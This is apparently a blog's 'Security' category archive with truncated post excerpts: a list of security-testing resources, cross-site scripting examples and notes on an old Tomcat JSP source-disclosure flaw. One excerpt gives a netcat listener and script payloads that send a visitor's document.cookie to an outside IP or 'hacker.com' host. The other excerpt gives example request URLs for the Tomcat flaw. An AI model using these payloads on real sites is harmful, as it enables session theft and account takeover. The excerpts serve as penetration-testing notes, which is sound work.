Category Archives: Security

OWASP (Open Web Application Security Project) http://www.owasp.org/ OSSTMM (Open Source Security Testing Methodology Manual) http://www.osstmm.org The NIST SP 800-42 at: http://csrc.nist.gov/publications/nistpubs/800-42/NIST-SP800-42.pdf The CISSP and SSCP Open Study Guides Web Site http://www.cccure.org The Professional Security Testers Warehouse http://www.professionalsecuritytesters.org

listener on evil host: nc -l -p 80 example script on attacked server: 1 &lt;script&gt;alert(document.cookie)&lt;/script&gt; Example 1 1 &lt;script&gt;document.write(\’&lt;img src=<a title="http://195.225.45.220/\’" href="http://195.225.45.220/%5C%27" rel="nofollow">http://195.225.45.220/\'</a> + document.cookie + \’&gt;\’)&lt;/script&gt; Example 2 1 &lt;script&gt;(new Image).src="<a title="http://195.225.45.220/c.php?c=" href="http://195.225.45.220/c.php?c=" rel="nofollow">http://195.225.45.220/c.php?c=</a>" + escape(document.cookie)&lt;/script&gt; Example 3 1 &lt;script&gt;(new Image).src='<a title="http://www.hacker.com/’" href="http://www.hacker.com/%27" … Continue reading →

Try to get the source Apache Software Foundation Tomcat 3.2.4 Apache Software Foundation Tomcat 3.2.3 http://example.com:80/examples/jsp/source.jsp?? http://example.com:80/examples/jsp/source.jsp?/jsp/ href=”http://localhost/serendipity/from%20http://www.securityfocus.com/bid/4876/exploit“>http://www.securityfocus.com/bid/4876/exploit</a></blockquote> Apache Software Foundation Tomcat 4.X [SECURITY] Apache Tomcat 4.x JSP source disclosure vulnerability 2. Details Let say you have valid URL like … Continue reading →

Ãœberwachung des Fernmeldeverkehrs